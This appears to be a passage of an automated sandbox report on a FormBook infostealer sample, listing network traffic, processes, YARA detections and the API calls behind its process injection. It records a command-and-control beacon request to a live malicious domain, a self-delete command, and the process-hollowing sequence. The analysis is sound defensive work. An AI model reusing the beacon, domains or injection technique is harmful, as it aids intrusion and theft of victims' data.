Jan 10, 2025 15:52:22.655673981 CET | 51858 | 53 | 192.168.2.4 | 1.1.1.1
Jan 10, 2025 15:52:22.667599916 CET | 53 | 51858 | 1.1.1.1 | 192.168.2.4
Jan 10, 2025 15:52:43.488162041 CET | 55845 | 53 | 192.168.2.4 | 1.1.1.1
Jan 10, 2025 15:52:43.497450113 CET | 53 | 55845 | 1.1.1.1 | 192.168.2.4
Jan 10, 2025 15:53:04.609961987 CET | 63737 | 53 | 192.168.2.4 | 1.1.1.1
Jan 10, 2025 15:53:04.624939919 CET | 53 | 63737 | 1.1.1.1 | 192.168.2.4
Jan 10, 2025 15:53:25.937292099 CET | 54000 | 53 | 192.168.2.4 | 1.1.1.1
Jan 10, 2025 15:53:26.300749063 CET | 53 | 54000 | 1.1.1.1 | 192.168.2.4
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Jan 10, 2025 15:49:37.343482018 CET | 192.168.2.4 | 1.1.1.1 | 0x2388 | Standard query (0) | www.ealthcare-trends-60670.bond | A (IP address) | IN (0x0001) | false
Jan 10, 2025 15:49:57.155132055 CET | 192.168.2.4 | 1.1.1.1 | 0xa52b | Standard query (0) | www.ental-health-69511.bond | A (IP address) | IN (0x0001) | false
Jan 10, 2025 15:50:17.717585087 CET | 192.168.2.4 | 1.1.1.1 | 0xa1a2 | Standard query (0) | www.wistlnc.net | A (IP address) | IN (0x0001) | false
Jan 10, 2025 15:50:37.954613924 CET | 192.168.2.4 | 1.1.1.1 | 0x5e77 | Standard query (0) | www.armanshop.xyz | A (IP address) | IN (0x0001) | false
Jan 10, 2025 15:50:58.546670914 CET | 192.168.2.4 | 1.1.1.1 | 0xe6d0 | Standard query (0) | www.ehills.shop | A (IP address) | IN (0x0001) | false
Jan 10, 2025 15:51:19.265645027 CET | 192.168.2.4 | 1.1.1.1 | 0x9e42 | Standard query (0) | www.uy-smart-tv-nl.today | A (IP address) | IN (0x0001) | false
Jan 10, 2025 15:51:39.742948055 CET | 192.168.2.4 | 1.1.1.1 | 0xce7a | Standard query (0) | www.vitor.live | A (IP address) | IN (0x0001) | false
Jan 10, 2025 15:52:01.263598919 CET | 192.168.2.4 | 1.1.1.1 | 0xdfa9 | Standard query (0) | www.raceg.cyou | A (IP address) | IN (0x0001) | false
Jan 10, 2025 15:52:22.655673981 CET | 192.168.2.4 | 1.1.1.1 | 0x3c89 | Standard query (0) | www.cctofi.cpa | A (IP address) | IN (0x0001) | false
Jan 10, 2025 15:52:43.488162041 CET | 192.168.2.4 | 1.1.1.1 | 0x26e8 | Standard query (0) | www.onnorbell.design | A (IP address) | IN (0x0001) | false
Jan 10, 2025 15:53:04.609961987 CET | 192.168.2.4 | 1.1.1.1 | 0x81b3 | Standard query (0) | www.orean-course-289113002.zone | A (IP address) | IN (0x0001) | false
Jan 10, 2025 15:53:25.937292099 CET | 192.168.2.4 | 1.1.1.1 | 0xbb8a | Standard query (0) | www.ransportationmwmptpro.top | A (IP address) | IN (0x0001) | false
                                                                                                                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                          Jan 10, 2025 15:49:37.352560043 CET1.1.1.1192.168.2.40x2388Name error (3)www.ealthcare-trends-60670.bondnonenoneA (IP address)IN (0x0001)false
                                                                                                                                          Jan 10, 2025 15:49:57.164133072 CET1.1.1.1192.168.2.40xa52bName error (3)www.ental-health-69511.bondnonenoneA (IP address)IN (0x0001)false
                                                                                                                                          Jan 10, 2025 15:50:17.727824926 CET1.1.1.1192.168.2.40xa1a2Name error (3)www.wistlnc.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                          Jan 10, 2025 15:50:37.972253084 CET1.1.1.1192.168.2.40x5e77Name error (3)www.armanshop.xyznonenoneA (IP address)IN (0x0001)false
                                                                                                                                          Jan 10, 2025 15:50:58.558268070 CET1.1.1.1192.168.2.40xe6d0Name error (3)www.ehills.shopnonenoneA (IP address)IN (0x0001)false
                                                                                                                                          Jan 10, 2025 15:51:19.274790049 CET1.1.1.1192.168.2.40x9e42Name error (3)www.uy-smart-tv-nl.todaynonenoneA (IP address)IN (0x0001)false
                                                                                                                                          Jan 10, 2025 15:51:40.050163984 CET1.1.1.1192.168.2.40xce7aNo error (0)www.vitor.live103.224.212.213A (IP address)IN (0x0001)false
                                                                                                                                          Jan 10, 2025 15:52:01.274040937 CET1.1.1.1192.168.2.40xdfa9Name error (3)www.raceg.cyounonenoneA (IP address)IN (0x0001)false
                                                                                                                                          Jan 10, 2025 15:52:22.667599916 CET1.1.1.1192.168.2.40x3c89Name error (3)www.cctofi.cpanonenoneA (IP address)IN (0x0001)false
                                                                                                                                          Jan 10, 2025 15:52:43.497450113 CET1.1.1.1192.168.2.40x26e8Name error (3)www.onnorbell.designnonenoneA (IP address)IN (0x0001)false
                                                                                                                                          Jan 10, 2025 15:53:04.624939919 CET1.1.1.1192.168.2.40x81b3Name error (3)www.orean-course-289113002.zonenonenoneA (IP address)IN (0x0001)false
                                                                                                                                          Jan 10, 2025 15:53:26.300749063 CET1.1.1.1192.168.2.40xbb8aName error (3)www.ransportationmwmptpro.topnonenoneA (IP address)IN (0x0001)false
                                                                                                                                          • www.vitor.live
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.4 | 50007 | 103.224.212.213 | 80 | 2580 | C:\Windows\explorer.exe

Timestamp | Bytes transferred | Direction | Data
Jan 10, 2025 15:51:40.058109999 CET | 164 | OUT | GET /m25s/?RR=ejXsf9CDJtAn3y938lXanCHlJWOupDiK8G2VK70kBEvHSxoyO9pX1brU4xQC+L5tXqcG&2d2x=dTjPadN8ifyHSjI HTTP/1.1
Host: www.vitor.live
Connection: close
Data Raw: 00 00 00 00 00 00 00
Data Ascii:

Target ID: 0
Start time: 09:48:57
Start date: 10/01/2025
Path: C:\Users\user\Desktop\n0srYVYMDI.exe
Wow64 process (32bit): true
Commandline: "C:\Users\user\Desktop\n0srYVYMDI.exe"
Imagebase: 0xf20000
File size: 766'464 bytes
MD5 hash: 7D311CDCEDA373FD94310919B7BDC784
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.1726895597.0000000004361000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000000.00000002.1726895597.0000000004361000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
• Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000000.00000002.1726895597.0000000004361000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
• Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.1726895597.0000000004361000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
• Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.1726895597.0000000004361000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
Reputation: low
Has exited: true

Target ID: 2
Start time: 09:48:59
Start date: 10/01/2025
Path: C:\Users\user\Desktop\n0srYVYMDI.exe
Wow64 process (32bit): true
Commandline: "C:\Users\user\Desktop\n0srYVYMDI.exe"
Imagebase: 0xc40000
File size: 766'464 bytes
MD5 hash: 7D311CDCEDA373FD94310919B7BDC784
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.1786764938.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.1786764938.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
• Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.1786764938.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
• Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.1786764938.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
• Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.1786764938.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
Reputation: low
Has exited: true

Target ID: 3
Start time: 09:49:00
Start date: 10/01/2025
Path: C:\Windows\explorer.exe
Wow64 process (32bit): false
Commandline: C:\Windows\Explorer.EXE
Imagebase: 0x7ff72b770000
File size: 5'141'208 bytes
MD5 hash: 662F4F92FDE3557E86D110526BB578D5
Has elevated privileges: false
Has administrator privileges: false
Programmed in: C, C++ or other language
Reputation: high
Has exited: false

Target ID: 4
Start time: 09:49:03
Start date: 10/01/2025
Path: C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit): true
Commandline: "C:\Windows\SysWOW64\cmd.exe"
Imagebase: 0x240000
File size: 236'544 bytes
MD5 hash: D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges: false
Has administrator privileges: false
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.4168791603.0000000002F60000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.4168791603.0000000002F60000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
• Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.4168791603.0000000002F60000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
• Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.4168791603.0000000002F60000.00000040.80000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
• Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.4168791603.0000000002F60000.00000040.80000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.4169039810.0000000003380000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.4169039810.0000000003380000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
• Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.4169039810.0000000003380000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
• Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.4169039810.0000000003380000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
• Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.4169039810.0000000003380000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.4169280068.0000000003780000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.4169280068.0000000003780000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
• Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.4169280068.0000000003780000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
• Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.4169280068.0000000003780000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
• Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.4169280068.0000000003780000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
Reputation: high
Has exited: false

Target ID: 5
Start time: 09:49:07
Start date: 10/01/2025
Path: C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit): true
Commandline: /c del "C:\Users\user\Desktop\n0srYVYMDI.exe"
Imagebase: 0x240000
File size: 236'544 bytes
MD5 hash: D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges: false
Has administrator privileges: false
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 6
Start time: 09:49:07
Start date: 10/01/2025
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff7699e0000
File size: 862'208 bytes
MD5 hash: 0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges: false
Has administrator privileges: false
Programmed in: C, C++ or other language
Reputation: high
Has exited: true


Execution Graph

Execution Coverage: 9.5%
Dynamic/Decrypted Code Coverage: 100%
Signature Coverage: 0%
Total number of Nodes: 243
Total number of Limit Nodes: 15
API calls 19236->19247 19248 7d07747 2 API calls 19236->19248 19249 7d0712a 2 API calls 19236->19249 19250 7d0722a 2 API calls 19236->19250 19251 7d0702b 2 API calls 19236->19251 19252 7d0736b 2 API calls 19236->19252 19253 7d0706f 2 API calls 19236->19253 19237->19153 19238 7d06c8e 19238->19153 19239->19238 19240->19238 19241->19238 19242->19238 19243->19238 19244->19238 19245->19238 19246->19238 19247->19238 19248->19238 19249->19238 19250->19238 19251->19238 19252->19238 19253->19238 19255 7d06c4a 19254->19255 19257 7d06bfb 19254->19257 19255->19153 19256 7d06bfd 19256->19153 19257->19256 19259 7d076d0 4 API calls 19257->19259 19260 7d07855 2 API calls 19257->19260 19261 7d0723d 4 API calls 19257->19261 19262 7d076bd 2 API calls 19257->19262 19263 7d0795e 2 API calls 19257->19263 19264 7d07440 2 API calls 19257->19264 19265 7d071a1 2 API calls 19257->19265 19266 7d071e2 2 API calls 19257->19266 19267 7d07225 2 API calls 19257->19267 19268 7d07747 2 API calls 19257->19268 19269 7d0712a 2 API calls 19257->19269 19270 7d0722a 2 API calls 19257->19270 19271 7d0702b 2 API calls 19257->19271 19272 7d0736b 2 API calls 19257->19272 19273 7d0706f 2 API calls 19257->19273 19258 7d06c8e 19258->19153 19259->19258 19260->19258 19261->19258 19262->19258 19263->19258 19264->19258 19265->19258 19266->19258 19267->19258 19268->19258 19269->19258 19270->19258 19271->19258 19272->19258 19273->19258 19275 7d07136 19274->19275 19276 7d07abb 19275->19276 19354 7d05b43 19275->19354 19358 7d05b48 19275->19358 19280 7d07964 19279->19280 19281 7d07987 19280->19281 19362 7d05c33 19280->19362 19366 7d05c38 19280->19366 19285 7d076ca 19284->19285 19370 7d054c3 19285->19370 19374 7d054c8 19285->19374 19286 7d07a8f 19290 7d0724f 19289->19290 19291 7d076ef 19290->19291 19378 7d05a88 19290->19378 19382 7d05a83 19290->19382 19291->19162 19292 7d0775e 19292->19291 19295 7d05b43 WriteProcessMemory 19292->19295 19296 7d05b48 WriteProcessMemory 19292->19296 19295->19291 19296->19291 19298 7d0785b 
19297->19298 19300 7d054c3 ResumeThread 19298->19300 19301 7d054c8 ResumeThread 19298->19301 19299 7d07a8f 19300->19299 19301->19299 19303 7d076dd 19302->19303 19304 7d071a9 19302->19304 19386 7d05573 19303->19386 19390 7d05578 19303->19390 19306 7d054c3 ResumeThread 19304->19306 19307 7d054c8 ResumeThread 19304->19307 19305 7d07a8f 19306->19305 19307->19305 19311 7d07075 19310->19311 19394 7d05dd0 19311->19394 19398 7d05dc4 19311->19398 19317 7d05b43 WriteProcessMemory 19315->19317 19318 7d05b48 WriteProcessMemory 19315->19318 19316 7d0739e 19317->19316 19318->19316 19320 7d07076 19319->19320 19322 7d05dd0 CreateProcessA 19320->19322 19323 7d05dc4 CreateProcessA 19320->19323 19321 7d0710b 19322->19321 19323->19321 19325 7d07237 19324->19325 19327 7d05c33 ReadProcessMemory 19325->19327 19328 7d05c38 ReadProcessMemory 19325->19328 19326 7d07987 19327->19326 19328->19326 19330 7d07136 19329->19330 19331 7d07abb 19330->19331 19332 7d05b43 WriteProcessMemory 19330->19332 19333 7d05b48 WriteProcessMemory 19330->19333 19332->19330 19333->19330 19335 7d0774d 19334->19335 19337 7d05b43 WriteProcessMemory 19335->19337 19338 7d05b48 WriteProcessMemory 19335->19338 19336 7d076ef 19336->19162 19337->19336 19338->19336 19341 7d07136 19339->19341 19340 7d07abb 19341->19162 19341->19340 19342 7d05b43 WriteProcessMemory 19341->19342 19343 7d05b48 WriteProcessMemory 19341->19343 19342->19341 19343->19341 19345 7d075cc 19344->19345 19347 7d05573 Wow64SetThreadContext 19345->19347 19348 7d05578 Wow64SetThreadContext 19345->19348 19346 7d075e7 19346->19162 19347->19346 19348->19346 19350 7d071a9 19349->19350 19352 7d054c3 ResumeThread 19350->19352 19353 7d054c8 ResumeThread 19350->19353 19351 7d07a8f 19352->19351 19353->19351 19355 7d05b46 WriteProcessMemory 19354->19355 19357 7d05be7 19355->19357 19357->19275 19359 7d05b76 WriteProcessMemory 19358->19359 19361 7d05be7 19359->19361 19361->19275 19363 7d05c38 ReadProcessMemory 19362->19363 19365 7d05cc7 19363->19365 19365->19281 19367 
7d05c83 ReadProcessMemory 19366->19367 19369 7d05cc7 19367->19369 19369->19281 19371 7d054c8 ResumeThread 19370->19371 19373 7d05539 19371->19373 19373->19286 19375 7d05508 ResumeThread 19374->19375 19377 7d05539 19375->19377 19377->19286 19379 7d05ac8 VirtualAllocEx 19378->19379 19381 7d05b05 19379->19381 19381->19292 19383 7d05a88 VirtualAllocEx 19382->19383 19385 7d05b05 19383->19385 19385->19292 19387 7d05578 Wow64SetThreadContext 19386->19387 19389 7d05605 19387->19389 19389->19304 19391 7d055bd Wow64SetThreadContext 19390->19391 19393 7d05605 19391->19393 19393->19304 19395 7d05e59 CreateProcessA 19394->19395 19397 7d0601b 19395->19397 19399 7d05dd0 CreateProcessA 19398->19399 19401 7d0601b 19399->19401 19141 7d07f98 19142 7d08123 19141->19142 19143 7d07fbe 19141->19143 19143->19142 19145 7d0483c 19143->19145 19146 7d08218 PostMessageW 19145->19146 19147 7d08284 19146->19147 19147->19143 19402 161f658 19403 161f69e GetCurrentProcess 19402->19403 19405 161f6f0 GetCurrentThread 19403->19405 19406 161f6e9 19403->19406 19407 161f726 19405->19407 19408 161f72d GetCurrentProcess 19405->19408 19406->19405 19407->19408 19409 161f763 GetCurrentThreadId 19408->19409 19411 161f7bc 19409->19411 19412 1616dd8 19413 1616de1 19412->19413 19414 1616e19 19413->19414 19416 1616e50 19413->19416 19417 1616e7a 19416->19417 19418 1616ed1 19417->19418 19419 1616e50 CreateActCtxA 19417->19419 19421 1616fc9 19417->19421 19418->19413 19419->19417 19422 1616fed 19421->19422 19426 16174d1 19422->19426 19430 16174e0 19422->19430 19428 16174e0 19426->19428 19427 16175e4 19427->19427 19428->19427 19434 161632c 19428->19434 19432 1617507 19430->19432 19431 16175e4 19431->19431 19432->19431 19433 161632c CreateActCtxA 19432->19433 19433->19431 19435 1618570 CreateActCtxA 19434->19435 19437 1618633 19435->19437
Memory Dump Source
• Source File: 00000000.00000002.1731156561.0000000007D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D00000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7d00000_n0srYVYMDI.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: b395f6e04337bc8e46e20c11f8eea7475b893b3ed90b3b3b3b8d2550b88dcea3
• Instruction ID: c57cb236de41b9927b9a3a30204048de487ec631a0f8018a1e9ca27f59bd6ab8
• Opcode Fuzzy Hash: b395f6e04337bc8e46e20c11f8eea7475b893b3ed90b3b3b3b8d2550b88dcea3
• Instruction Fuzzy Hash: B0D1BBB17017118FDB15EB79C8607AEBBF7AF89200F18486DD1868B2D5CB35E841C7A5
Memory Dump Source
• Source File: 00000000.00000002.1731156561.0000000007D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D00000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7d00000_n0srYVYMDI.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 7a8a392b4e844efdd5364e241fc43ac472b2ef8a6eef6b5942baa9154bcaa5bc
• Instruction ID: 0bbe17d0879f42ccdf186367b3a262d1f6d96721ee917087c4f2488228ac7f8d
• Opcode Fuzzy Hash: 7a8a392b4e844efdd5364e241fc43ac472b2ef8a6eef6b5942baa9154bcaa5bc
• Instruction Fuzzy Hash: 0F3118B0D057599FDB15CFAAC8443DDBFB2AF8A310F04C0AAD008AB295DB744845CBA1
Memory Dump Source
• Source File: 00000000.00000002.1731156561.0000000007D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D00000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7d00000_n0srYVYMDI.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: d6c70c770206cf9f7aa892fedda4f0600f61f507845534bd54403d630c284b6e
• Instruction ID: af027be33a2a3e49a754cdf2f5e5217f7ebacc0a2bca2183984b82e65f7ebde1
• Opcode Fuzzy Hash: d6c70c770206cf9f7aa892fedda4f0600f61f507845534bd54403d630c284b6e
• Instruction Fuzzy Hash: A231B1B0D046189BEB18CF9AC9487DEFAF6BF89300F14D06AD409B6294DB744946CFA0

Control-flow Graph (graph data omitted)
APIs
• GetCurrentProcess.KERNEL32 ref: 0161F6D6
• GetCurrentThread.KERNEL32 ref: 0161F713
• GetCurrentProcess.KERNEL32 ref: 0161F750
• GetCurrentThreadId.KERNEL32 ref: 0161F7A9
Memory Dump Source
• Source File: 00000000.00000002.1724836918.0000000001610000.00000040.00000800.00020000.00000000.sdmp, Offset: 01610000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_1610000_n0srYVYMDI.jbxd
Similarity
• API ID: Current$ProcessThread
• String ID:
• API String ID: 2063062207-0
• Opcode ID: e5bab5a63ea0d053193f6340085daccd94cc8a87570043f2ace001bf166d306c
• Instruction ID: 2679548cc3afbbe594b314d9f150181bb05bb53253b8b8e351d3df0a49884d25
• Opcode Fuzzy Hash: e5bab5a63ea0d053193f6340085daccd94cc8a87570043f2ace001bf166d306c
• Instruction Fuzzy Hash: E05158B09006098FDB04DFAAE948BAEBBF1FF48304F24C059D419A7360D734A984CF65

Control-flow Graph (graph data omitted)
APIs
• CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 07D06006
Memory Dump Source
• Source File: 00000000.00000002.1731156561.0000000007D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D00000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7d00000_n0srYVYMDI.jbxd
Similarity
• API ID: CreateProcess
• String ID:
• API String ID: 963392458-0
• Opcode ID: 6b9448fa7c3f1e353c926f02ca6f5b0dad549e8d676fad4e0f82dd592a39b60c
• Instruction ID: 46b8d30022f26524db52c48b6babe3abd5560298dc608e59b53683a493c2d403
• Opcode Fuzzy Hash: 6b9448fa7c3f1e353c926f02ca6f5b0dad549e8d676fad4e0f82dd592a39b60c
• Instruction Fuzzy Hash: 61A15EB1D0021ADFDB10CF68D841BEDFBB2BF44314F1481AAE849A7290DB749995CF92

Control-flow Graph (graph data omitted)
APIs
• CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 07D06006
Memory Dump Source
• Source File: 00000000.00000002.1731156561.0000000007D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D00000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7d00000_n0srYVYMDI.jbxd
Similarity
• API ID: CreateProcess
• String ID:
• API String ID: 963392458-0
• Opcode ID: 29997c3965bdc168701a6e427a9dca73e6b776a96c4c8a764f7688be50b3bb12
• Instruction ID: 43c51bc08f35ff4f6ee746f1cffe1b68b670172b1ec556f74128d88e51c2a0bf
• Opcode Fuzzy Hash: 29997c3965bdc168701a6e427a9dca73e6b776a96c4c8a764f7688be50b3bb12
• Instruction Fuzzy Hash: E0914DB1D0021ADFDB14CF68C841BEDFBB2BF48310F1481A9E859A7290DB749995CF92

Control-flow Graph (graph data omitted)
APIs
• CreateActCtxA.KERNEL32(?), ref: 01618621
Memory Dump Source
• Source File: 00000000.00000002.1724836918.0000000001610000.00000040.00000800.00020000.00000000.sdmp, Offset: 01610000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_1610000_n0srYVYMDI.jbxd
Similarity
• API ID: Create
• String ID:
• API String ID: 2289755597-0
• Opcode ID: 7abecf67fabc8281c206b026224a14bb28142777ba18c4626bff2ebccbdb7991
• Instruction ID: 46122853d461e461f6e754c7a5ebfdf6dcd377898379ec5e7d3f88d2d2676de6
• Opcode Fuzzy Hash: 7abecf67fabc8281c206b026224a14bb28142777ba18c4626bff2ebccbdb7991
• Instruction Fuzzy Hash: CD41D2B0C00719CFDB24DFAAC944B9DBBF5BF45304F24845AD408AB255DB756985CF90

Control-flow Graph (graph data omitted)
                                                                                                                                            APIs
                                                                                                                                            • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 07D05BD8
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1731156561.0000000007D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D00000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_7d00000_n0srYVYMDI.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: MemoryProcessWrite
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3559483778-0
                                                                                                                                            • Opcode ID: 4b7fd1eeb94ac3193ec729e49692810300a451b0b75c298425722908626d791e
                                                                                                                                            • Instruction ID: 7c27b2ed00a855e03374f960a252898bef548894928927fa04f64698b62a138e
                                                                                                                                            • Opcode Fuzzy Hash: 4b7fd1eeb94ac3193ec729e49692810300a451b0b75c298425722908626d791e
                                                                                                                                            • Instruction Fuzzy Hash: B33158B58003499FCB10DFA9D845BEEBFF0FB48320F10852AE959A7291D778A554CBA0

Control-flow Graph: [graph image not reproduced; basic blocks 7d05b48-7d05c1e, call to WriteProcessMemory in block 7d05ba6-7d05be5]
APIs
• WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 07D05BD8
Memory Dump Source
• Source File: 00000000.00000002.1731156561.0000000007D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D00000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7d00000_n0srYVYMDI.jbxd
Similarity
• API ID: MemoryProcessWrite
• String ID:
• API String ID: 3559483778-0
• Opcode ID: bcb5b08ed0964c8530a0961b65cdae453ca3fb8980138695185def58daeb8cf9
• Instruction ID: e510993c90988c643290a26e4e1e544b4d017d0bcdccbd8ac1ce073059daab85
• Opcode Fuzzy Hash: bcb5b08ed0964c8530a0961b65cdae453ca3fb8980138695185def58daeb8cf9
• Instruction Fuzzy Hash: 5D2155B19003199FCB10DFA9C885BDEBBF5FF48310F10842AE959A7250C778A954CFA4

Control-flow Graph: [graph image not reproduced; basic blocks 7d05573-7d0563c, call to Wow64SetThreadContext in block 7d055d3-7d05603]
APIs
• Wow64SetThreadContext.KERNEL32(?,00000000), ref: 07D055F6
Memory Dump Source
• Source File: 00000000.00000002.1731156561.0000000007D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D00000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7d00000_n0srYVYMDI.jbxd
Similarity
• API ID: ContextThreadWow64
• String ID:
• API String ID: 983334009-0
• Opcode ID: 091754064ab49f26c8bf9547ea043b8c7ffaa9e0821b317076bf1b965a48516b
• Instruction ID: d439a45d62a470f01b12fbca5d070e67508d9ccf54b367794216fb65563d93cc
• Opcode Fuzzy Hash: 091754064ab49f26c8bf9547ea043b8c7ffaa9e0821b317076bf1b965a48516b
• Instruction Fuzzy Hash: 482139B19003498FDB10DFAAC445BEEFFF4AF48324F54842AD859A7241CB789944CFA5

Control-flow Graph: [graph image not reproduced; basic blocks 7d05c33-7d05cfe, call to ReadProcessMemory in block 7d05c33-7d05cc5]
APIs
• ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 07D05CB8
Memory Dump Source
• Source File: 00000000.00000002.1731156561.0000000007D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D00000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7d00000_n0srYVYMDI.jbxd
Similarity
• API ID: MemoryProcessRead
• String ID:
• API String ID: 1726664587-0
• Opcode ID: f54b84896ccdeb80f5d87abbd9f6429b37e984eb6f4f4a1d604c524354c128c2
• Instruction ID: c5018e8a680b4370e7926170f81e968be1b4cda25654d4dba41a5b96b33ed765
• Opcode Fuzzy Hash: f54b84896ccdeb80f5d87abbd9f6429b37e984eb6f4f4a1d604c524354c128c2
• Instruction Fuzzy Hash: 412136B18003599FCB10DFAAC841BEEFBF5FF48320F10842AE959A7250C7349954CBA5

Control-flow Graph: [graph image not reproduced; basic blocks 7d05578-7d0563c, call to Wow64SetThreadContext in block 7d055d3-7d05603]
APIs
• Wow64SetThreadContext.KERNEL32(?,00000000), ref: 07D055F6
Memory Dump Source
• Source File: 00000000.00000002.1731156561.0000000007D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D00000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7d00000_n0srYVYMDI.jbxd
Similarity
• API ID: ContextThreadWow64
• String ID:
• API String ID: 983334009-0
• Opcode ID: 5f5129a832d1362cd6a3ac4f6614b126f0c5ef18660759856e788ff27c3b5e02
